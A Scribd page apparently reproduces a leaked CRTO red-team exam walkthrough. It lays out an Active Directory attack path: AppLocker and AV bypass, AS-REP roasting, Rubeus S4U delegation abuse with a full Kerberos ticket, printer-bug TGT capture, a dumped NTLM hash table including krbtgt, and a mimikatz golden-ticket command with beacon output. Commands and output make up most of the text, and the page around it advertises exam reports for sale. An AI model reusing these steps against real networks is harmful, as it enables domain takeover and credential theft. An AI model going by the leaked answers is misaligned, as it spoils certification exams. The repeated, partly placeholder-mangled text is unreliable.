0% found this document useful (0 votes)

4K views6 pages

CRTO v1

Uploaded by

soheil hashemi

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

4K views6 pages

CRTO v1

Uploaded by

soheil hashemi

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

Rdp into given machine

AttackPath:

First machine It will be wkstn3

Wkstn-3 (always elevated) -> srv-1 (constrained delegation)-> srv-2 (unconstrained delegation printer
bug)-> dc-2 -> cross trust > dc-1 >sql

Install PowerShell 6 if u need bypass Constrained language mode,

you need to bypass av at wkstn-3 and from the enumeration( your beacon need to be undetected if
using CS)
If using covenant [Link]

Open ur beacon to get a shell back. To get system u need to follow course material always install
elevated and change it to [Link] as per the app locker policy and place in task.

Run bloodhound
asperoast jjames and atorres and crack them
Psexec into srv-1
On srv-1

Impersonate ofisher with contrained delegation

shell c:\temp\[Link] s4u /domain:[Link]

/ticket:doIFYzCCBV+gAwIBBaEDAgEWooIESzCCBEdhggRDMIIEP6ADAgEFoRgbFkNISUxELlJFRFRFQU1P
UFMuTE9DQUyiKzApoAMCAQKhIjAgGwZrcmJ0Z3QbFkNISUxELlJFRFRFQU1PUFMuTE9DQUyjggPvMII
D66ADAgESoQMCAQKiggPdBIID2baP41WgentW8su9Hevgb/J4Mygq32wmOqQ7f4N9Kx4WaVRS5D8
Mc3vQ7R/XO3ARAY7RV1MyBg7CQENMK87Wfgejad2a0bYXyHu1moCDjYHjNMJO3n4zOZ7FkDPEDOy
RJPgUae1EO9vsipYJjz2/PhBeq2+x6sAFtv7eFIUzzgJeWFyNj5FI/8QWfHwczI08nGDVwHK6rILbNp0e/6T
ychIBtHROnBccvOapIiitWWN4j6Ra5YokuFCp7ZBlX2LQhKSjTnM2/ik9fyMW21RuP6bU6VmSZDNTBRA
QNDoAlwFRR8aE/2LmQ8Mjyj7mCgd7z3jtjdJHaaUqLLkRb2kBzf6QPsnG7KgaWUri+hwk7zrLzFzMHAJN
qy9Y98b31cmUMwj/25lHsPX0WoB4Plb29Rja6GtSzEQ5Y+Tj6VpTXL9DpKJke1hMQc+T44rdEG35ACrZ
NL3Y7A+E3tNhhcFP/xmqXtWqlz6Iar2A5eMw1QXO5qtj670U1KvmSY/rS8gxS9ey/pApYlXZASbaq8Mhy
HsqF9RKy4H+96Y+kTQvma9sN2KaLVHfeUp9BULFCdzFJY3A6QPjI+gOaYacMqvcdkUINrquNLXMuAZHk
2cME43Y4VytTTX8XApVBnIhEVGNb8fPaarXOzO4UNlFi4bpuWKGfOtthLCYZMU/hu02V5JqskJG907kPn
OED40klDpi4izgCaJK5vJ44/Qh0D8njjr4TN6EpbpcfrVmokCX1muUU8zlEHy6XglP1OkQH+29OZV9U/7V/
xq5+tdTPfOC4YrkYVZxBR/N2wPXYzKjK1q7Fx3AVigU45xiwBbSt1pEcp/lmyw8iN1nVDPWmV4kV+wS/b
+jj3oTOH1s/EVhDjNI567gL7U9GkZ7I59Ch/FvzKDpMzRrYmn0RB1B6QpAEr7r0P9aGXmd1M21SEVkJgC
TM7aYvCLeCq5Eh2NtWJRct6Qz27WIZZ4K5g5RPHs/ZQr5UPgTCh1taPAdV9wmFcoUDy+tGgVSb+S+Vi2
qp6R3pIJomqTzjyUTbilqCh0OZT6Nk8H2N5Sf4e49apyD1SJsdf7qHXg6TPyD6YVZzL7j3WSzRbOV2wrHx
TRO+fug2yx2ZO6GZga4PdDmda5Lpq+BNZFX+ADZ/hxtMJpIv6tVbTEK02eJUApow/Q1k30Jnmv+hM0q
r/bKrqvlcQnRUtuEQd/phdNIgVSjjIcH+V0WGFkvUiH0Mrlh3msx1ndnzD97GPkb7puXTNxYoEwT4Y7VR
eUJSjZ2Z8ia/n3vP5aCkJgTBa9pOEpk9O7d8bLNTSp4sRgkiQpuMWCjggECMIH/oAMCAQCigfcEgfR9gfE
wge6ggeswgegwgeWgKzApoAMCARKhIgQgepHAZAV9TuCTEZnPcjMLIKALQhUXreRqmQh2OhBNkzuh
GBsWQ0hJTEQuUkVEVEVBTU9QUy5MT0NBTKITMBGgAwIBAaEKMAgbBlNSVi0xJKMHAwUAYKEAAKU
RGA8yMDIxMDEzMTAzMzAwN1qmERgPMjAyMTAxMzExMzMwMDdapxEYDzIwMjEwMjA1MTIzNTM
2WqgYGxZDSElMRC5SRURURUFNT1BTLkxPQ0FMqSswKaADAgECoSIwIBsGa3JidGd0GxZDSElMRC5SR
URURUFNT1BTLkxPQ0FM
/impersonateuser:Administrator /msdsspn:time/[Link] /altservice:cifs,host
/ptt

Do uncontrained delegation on srv-2 to reach dc-2

.\[Link] monitor /interval:1 (run this on the computer with unconstrained delegation)
Then on another window: .\[Link] [Link] [Link]

so get 2 shells, first start rubeus monitor

then use [Link] to trigger printer bug

so for you it will be .\[Link] [Link] [Link] For

me i just ran monitor and got the tgt
[Link] ptt /ticket:<<paste the above ticket here>>

Jump to dc-2

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c97d17a1aa433f4706143eaf9509[Link]
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0[Link]
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6ad171448618690dde2c67f72b85[Link]
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:
::
ZPS-
9410[Link]b51404eeaad3b435b51404ee:37dd0e1e8fb505d2e5baaf4a27d2[Link]
atorres:2102:aad3b435b51404eeaad3b435b51404ee:f442e0cc228d1a0cb4621ebce433[Link]
jjames:2103:aad3b435b51404eeaad3b435b51404ee:59fc0f884922b4ce376051134c71[Link]
ofisher:2104:aad3b435b51404eeaad3b435b51404ee:0b51e7394c48a3cd6213e2d2e3dc[Link]
DC-2$:1000:aad3b435b51404eeaad3b435b51404ee:684762dd74088932d08c4291f3d6[Link]
WKSTN-6$:1104:aad3b435b51404eeaad3b435b51404ee:5a28fee9c547fa6f75439d7aec8e[Link]
WKSTN-5$:1105:aad3b435b51404eeaad3b435b51404ee:4503ec7275fa9b51cc611696fef6[Link]
WKSTN-4$:1106:aad3b435b51404eeaad3b435b51404ee:b4ffef5d5c26fedba82d08e4611b[Link]
WKSTN-3$:1107:aad3b435b51404eeaad3b435b51404ee:1bd6c35d565146c567d4c6de7cd6[Link]
SRV-1$:1109:aad3b435b51404eeaad3b435b51404ee:877781f8fa251a5801dee79ef8ee[Link]
SRV-2$:1110:aad3b435b51404eeaad3b435b51404ee:b2aadbe584c0f2c0d2a56237e8f1[Link]
RTO$:1103:aad3b435b51404eeaad3b435b51404ee:e84d40ca65ccac1f8c19237653a9[Link]

mimikatz kerberos::golden /domain:[Link] /sid:S-1-5-21-2453654091-

643072361669735849 /krbtgt:6ad171448618690dde2c67f72b85a5ea /sids:S-1-5-21-2453654091-
643072361669735849-519 /user:administrator /ptt
[*] Tasked beacon to run mimikatz's kerberos::golden /domain:[Link] /sid:S-1-5-
212453654091-64307236-1669735849 /krbtgt:6ad171448618690dde2c67f72b85a5ea /sids:S-1-5-21-
2453654091-64307236-1669735849-519 /user:administrator /ptt command
[+] host called home, sent: 706122 bytes [+] received output:
User : administrator
Domain : [Link] (CHILD)
SID : S-1-5-21-2453654091-64307236-1669735849
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2453654091-64307236-1669735849-519 ;
ServiceKey: 6ad171448618690dde2c67f72b85a5ea - rc4_hmac_nt
Lifetime :

-> Ticket : Pass The Ticket

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ [Link]' successfully submitted for current session

CRTO July2022 6flags
No ratings yet
CRTO July2022 6flags
25 pages
E CPTX
No ratings yet
E CPTX
13 pages
CRTO v1
No ratings yet
CRTO v1
6 pages
EscapeTwo HTB Writeup
No ratings yet
EscapeTwo HTB Writeup
8 pages
CRTE Report
100% (1)
CRTE Report
19 pages
7flagsCRTO Exam Writeup - May 2022
No ratings yet
7flagsCRTO Exam Writeup - May 2022
13 pages
Cybernetics PDF
No ratings yet
Cybernetics PDF
155 pages
Maze - Runner#0964: If You Want To Buy The Reports For Cheap Price DM Me On Discord
No ratings yet
Maze - Runner#0964: If You Want To Buy The Reports For Cheap Price DM Me On Discord
33 pages
CRTP Notes
100% (1)
CRTP Notes
33 pages
CRTP Report Phase1 Phase2 English
100% (1)
CRTP Report Phase1 Phase2 English
4 pages
Writeup 1
No ratings yet
Writeup 1
4 pages
CRTP Report Pro 1st
No ratings yet
CRTP Report Pro 1st
22 pages
Dante Guide PDF
100% (1)
Dante Guide PDF
17 pages
CRTP
No ratings yet
CRTP
30 pages
OSCP - 2022 - Standalones - October - 19 Machines
No ratings yet
OSCP - 2022 - Standalones - October - 19 Machines
32 pages
CRTE Latest
No ratings yet
CRTE Latest
21 pages
Oscp
100% (3)
Oscp
6 pages
OSCP Exam Report
No ratings yet
OSCP Exam Report
26 pages
Maze - Runner#0964: If You Want To Buy The Reports For Cheap Price DM Me On Discord
No ratings yet
Maze - Runner#0964: If You Want To Buy The Reports For Cheap Price DM Me On Discord
33 pages
OSEP ACBank
100% (1)
OSEP ACBank
8 pages
Pascha Mobile Mouse Server 9099 Metasploit Privilege Escalation Overwriting Service Windows
100% (2)
Pascha Mobile Mouse Server 9099 Metasploit Privilege Escalation Overwriting Service Windows
5 pages
CRTP Command Checklists
100% (1)
CRTP Command Checklists
6 pages
OSCP Notes - Privilege Escalation (Windows)
No ratings yet
OSCP Notes - Privilege Escalation (Windows)
14 pages
Burp Update
No ratings yet
Burp Update
26 pages
CRTA Practise Lab Walkthrough - CRTA - Practise - Lab - Walkthrough
100% (2)
CRTA Practise Lab Walkthrough - CRTA - Practise - Lab - Walkthrough
16 pages
OSEP Additional Note
100% (1)
OSEP Additional Note
2 pages
OSWE Exam Report
No ratings yet
OSWE Exam Report
33 pages
CRTP Notes Meshari Almalki
No ratings yet
CRTP Notes Meshari Almalki
121 pages
Oscp PDF
100% (1)
Oscp PDF
31 pages
New Text Document
No ratings yet
New Text Document
2 pages
BSCP Exam 3
0% (1)
BSCP Exam 3
5 pages
CPTS PDF
50% (2)
CPTS PDF
30 pages
BSCP Official Exam
100% (2)
BSCP Official Exam
12 pages
OSWE Exam Report
No ratings yet
OSWE Exam Report
5 pages
Medtech Notes - MD
No ratings yet
Medtech Notes - MD
8 pages
Nagoya Proving Grounds Practice Walkthrough Medium PDF
100% (1)
Nagoya Proving Grounds Practice Walkthrough Medium PDF
20 pages
Challenge 6
No ratings yet
Challenge 6
30 pages
eCPPTv3 Labs-3 PDF
100% (1)
eCPPTv3 Labs-3 PDF
11 pages
Certified Red Team Professional (CRTP)
100% (1)
Certified Red Team Professional (CRTP)
33 pages
BSCP Exam 1
No ratings yet
BSCP Exam 1
4 pages
Prepare To BSCP
No ratings yet
Prepare To BSCP
2 pages
Exam CRTP Krecendo Template
0% (1)
Exam CRTP Krecendo Template
11 pages
CRTP-full Exam Report
67% (9)
CRTP-full Exam Report
23 pages
Emapt Pre Exam
No ratings yet
Emapt Pre Exam
6 pages
CRTP Writeup
No ratings yet
CRTP Writeup
21 pages
OSCP Exam Report
50% (2)
OSCP Exam Report
24 pages
Contenido
No ratings yet
Contenido
21 pages
BSCP в 2025
No ratings yet
BSCP в 2025
30 pages
102 - OSCP (Chlorine) Hide01.ir
0% (1)
102 - OSCP (Chlorine) Hide01.ir
2 pages
OSCP Survival Guide
No ratings yet
OSCP Survival Guide
52 pages
@FsKnockouT-28. Attacking Enterprise Networks
No ratings yet
@FsKnockouT-28. Attacking Enterprise Networks
126 pages
Rasta Labs
No ratings yet
Rasta Labs
29 pages
Pen Test Insights for Managers
100% (1)
Pen Test Insights for Managers
59 pages
OSEP - Scada Electrician
100% (5)
OSEP - Scada Electrician
39 pages
HTB Oscp Review
No ratings yet
HTB Oscp Review
18 pages
Anonymous Scepter
100% (3)
Anonymous Scepter
31 pages
Lab 1
50% (2)
Lab 1
14 pages
Outdated
No ratings yet
Outdated
16 pages
Shadow of The Undead
No ratings yet
Shadow of The Undead
17 pages
Hbgary Shell Trojan Gens
No ratings yet
Hbgary Shell Trojan Gens
28 pages
Infographic Cotabato
No ratings yet
Infographic Cotabato
1 page
Stephanie Aguilar: Bilingual Math Teacher Profile
No ratings yet
Stephanie Aguilar: Bilingual Math Teacher Profile
1 page
American Airlines Analysis
No ratings yet
American Airlines Analysis
11 pages
Fall 2024 Department Syllabus SPC 2608
No ratings yet
Fall 2024 Department Syllabus SPC 2608
11 pages
Final Project: Submitted by
No ratings yet
Final Project: Submitted by
15 pages
Spiritualist Feminism in Fin de Siècle France
No ratings yet
Spiritualist Feminism in Fin de Siècle France
63 pages
Amici Institutional - Corrections
No ratings yet
Amici Institutional - Corrections
204 pages
Offer Letter for R&D Manager
No ratings yet
Offer Letter for R&D Manager
1 page
Report Com2512
No ratings yet
Report Com2512
7 pages
Medical Students on DID Analysis
No ratings yet
Medical Students on DID Analysis
12 pages
4th GK PA2
No ratings yet
4th GK PA2
2 pages
Questionnaire Family Constellation.
100% (3)
Questionnaire Family Constellation.
3 pages
Pt. Sundarlal Sharma (Open) University Chhattisgarh, Bilaspur
No ratings yet
Pt. Sundarlal Sharma (Open) University Chhattisgarh, Bilaspur
1 page
Roof PV System Analysis in Hanoi
No ratings yet
Roof PV System Analysis in Hanoi
1 page
Christianity, Imperialism, and Culture
100% (1)
Christianity, Imperialism, and Culture
325 pages
Genxhire Recruitment Process Study
No ratings yet
Genxhire Recruitment Process Study
26 pages
ISE Password Recovery Mechanisms
No ratings yet
ISE Password Recovery Mechanisms
8 pages
Pag Ibig Fund V11 Form
No ratings yet
Pag Ibig Fund V11 Form
1 page
Module 17-The Price Act (RA 7581)
No ratings yet
Module 17-The Price Act (RA 7581)
49 pages
21st Century Philippine Literature Module
No ratings yet
21st Century Philippine Literature Module
16 pages
CPAR Module 6: Contemporary Arts Overview
No ratings yet
CPAR Module 6: Contemporary Arts Overview
3 pages
CurrentTap 1st To 31st March 2024 Lyst1713785748854
No ratings yet
CurrentTap 1st To 31st March 2024 Lyst1713785748854
96 pages
Chapter 55 - 56 - 57 Con Criticità .Doc - 0
No ratings yet
Chapter 55 - 56 - 57 Con Criticità .Doc - 0
12 pages
Briefing On The Situation in South Sudan - Amani Africa
No ratings yet
Briefing On The Situation in South Sudan - Amani Africa
4 pages
Sainik
No ratings yet
Sainik
70 pages
Yasin 23007786
No ratings yet
Yasin 23007786
1 page
Job Evaluation
50% (2)
Job Evaluation
16 pages
The Role of Leadership in Managing The Development Process
100% (1)
The Role of Leadership in Managing The Development Process
23 pages
McDonald's Marketing Assignment
No ratings yet
McDonald's Marketing Assignment
9 pages
Format Data Mejelis Taklim Negeri Dan Swasta Tingk Desa Dan Kel 2025-1
No ratings yet
Format Data Mejelis Taklim Negeri Dan Swasta Tingk Desa Dan Kel 2025-1
2 pages

CRTO v1

Uploaded by

CRTO v1

Uploaded by

Rdp into given machine

First machine It will be wkstn3

Install PowerShell 6 if u need bypass Constrained language mode,

Impersonate ofisher with contrained delegation

shell c:\temp\[Link] s4u /domain:[Link]

Do uncontrained delegation on srv-2 to reach dc-2

so get 2 shells, first start rubeus monitor

then use [Link] to trigger printer bug

so for you it will be .\[Link] [Link] [Link] For

mimikatz kerberos::golden /domain:[Link] /sid:S-1-5-21-2453654091-

-> Ticket : ** Pass The Ticket **

You might also like

-> Ticket : Pass The Ticket